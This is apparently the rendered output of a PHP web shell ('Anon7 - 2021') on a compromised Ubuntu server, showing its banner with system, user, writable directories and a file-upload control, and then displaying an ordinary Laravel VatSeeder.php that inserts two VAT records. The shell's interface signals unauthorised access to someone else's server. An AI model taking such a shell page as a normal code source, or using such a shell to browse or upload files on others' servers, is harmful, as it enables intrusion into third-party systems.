KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1525618.contaboserver.net 5.4.0-105-generic #119-Ubuntu SMP Mon Mar 7 18:49:24 UTC 2022 x86_64
User : www-data ( 33)
PHP Version : 8.2.12
Disable Function : NONE
Directory :  /var/www/___pospro/superadmin.balancebizness.com/database/seeders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/___pospro/superadmin.balancebizness.com/database/seeders/VatSeeder.php
<?php

namespace Database\Seeders;

use App\Models\Vat;
use Illuminate\Database\Console\Seeds\WithoutModelEvents;
use Illuminate\Database\Seeder;

class VatSeeder extends Seeder
{
    /**
     * Run the database seeds.
     */
    public function run(): void
    {
        $vats = array(
            array('name' => 'vat 1','business_id' => '1','rate' => '5','sub_vat' => NULL,'status' => '1','created_at' => now(),'updated_at' => now()),
            array('name' => 'vat 2','business_id' => '1','rate' => '10','sub_vat' => NULL,'status' => '1','created_at' => now(),'updated_at' => now())
        );
        Vat::insert($vats);

    }
}

Anon7 - 2021